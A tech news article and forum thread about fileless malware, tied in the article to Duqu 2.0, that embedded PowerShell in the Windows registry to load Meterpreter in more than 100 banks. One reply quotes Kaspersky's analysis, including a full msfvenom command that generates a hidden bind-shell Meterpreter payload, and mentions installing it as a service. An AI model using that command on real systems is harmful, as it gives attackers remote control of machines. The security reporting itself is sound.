A type of fileless malware related to Stuxnet has infected over 100 banks around the world

midian182

midian182

Posts: 9,722   +121
Staff member

It’s been seven years since Stuxnet, the computer worm thought to have been built as an American-Israeli cyberweapon, infected Iran’s nuclear facilities and caused damage that set the country’s nuclear program back by two years. Now, a derivative of the malicious software has infected over one hundred banks and other financial institutions around the world.

Russian cybersecurity company and anti-virus group Kaspersky Lab first discovered the new malware, called Duqu 2.0, on its corporate network back in 2014. As it resides almost completely in the memory of the computers, it went undetected for six months or more, reports Ars Technica.

New research from Kaspersky claims the invisible, fileless malware has gone mainstream and is now found on networks in 40 countries belonging to at least 140 institutions, including banks, government organizations, and telecommunication companies. There have been 21 instances in the US, though the actual number could be much higher, given how hard it is to detect.

Once an infected computer is rebooted, the malware renames itself, making it difficult for digital forensic experts to find any traces of the malware. It was only discovered by a bank’s security team after it found a copy of Meterpreter—an in-memory component of Metasploit—inside the physical memory of a Microsoft domain controller. Researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands.

"We're looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpretor and then carry out actions from there with native Windows utilities and system administrative tools," Kaspersky Lab expert Kurt Baumgartner told Ars.

To what extent the malware's presence could affect consumers who use the infected financial institutions is unclear. Kaspersky Labs said it will provide further details of the attacks and their objectives at the Security Analyst Summit in April.

Permalink to story.

https://www.techspot.com/news/68098-type-fileless-malware-related-stuxnet-has-infected-over.html

 
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.
 
Been wondering when Stuxnet would come around to bite us. Actually there are several ways to "hide" the code so it reloads on reboot and there are more than a few examples of the code hidden in "other than hard drive". My favorite was the one that could reside in the 16k buffer on the keyboard ..... never did figure out how that one survived!
 
... don't forget the attached printer and the GPU where no AV can look for it.
 
  • Like
Reactions: Phr3d
Kibaruk said:
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.
Click to expand...

That excerpt was excluded from this article, the full description can be found in the link

Here is what you are looking for

"This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:

msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host."
 
  • Like
Reactions: Kibaruk, Andromadus and Yynxs
Way back before 9/11 and iPhones, these were named Virus for very good reason -
it is too painfully comical if Stux returns -and Years later- to haunt its inventors. Hubris S(t)ux
 
Kibaruk said:
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.
Click to expand...

Depends. A soft-reboot won't necessarily clear the memory. A hard shut-down is supposed to. It may also be writing itself to non-volatile memory before shutdown is complete and then writing back to memory upon startup.
 
roberthi said:
Kibaruk said:
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.
Click to expand...

Depends. A soft-reboot won't necessarily clear the memory. A hard shut-down is supposed to. It may also be writing itself to non-volatile memory before shutdown is complete and then writing back to memory upon startup.
Click to expand...

Another thing to keep in mind is that capacitors can sometimes hold enough charge long enough to keep an item working for a very shot period...as in when you unplug a radio or something like that and the light is still on for just a second or two.
 
You must log in or register to reply here.

Similar threads

E
Another day, another FBI takedown of routers infected by malware
Replies
7
Views
215
p51d007
p51d007
midian182
Number of data breaches falls globally, triples in the US
Replies
11
Views
232
dangh
dangh
midian182
Latest Steam survey: Nvidia's mid-range GPUs top the charts, a bad month for AMD
Replies
23
Views
285
Lew Zealand
Lew Zealand

Latest posts

Back